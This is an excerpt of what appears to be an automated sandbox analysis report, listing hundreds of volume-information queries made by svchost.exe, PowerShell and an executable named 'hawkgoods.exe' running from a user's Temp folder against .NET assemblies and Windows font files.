                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
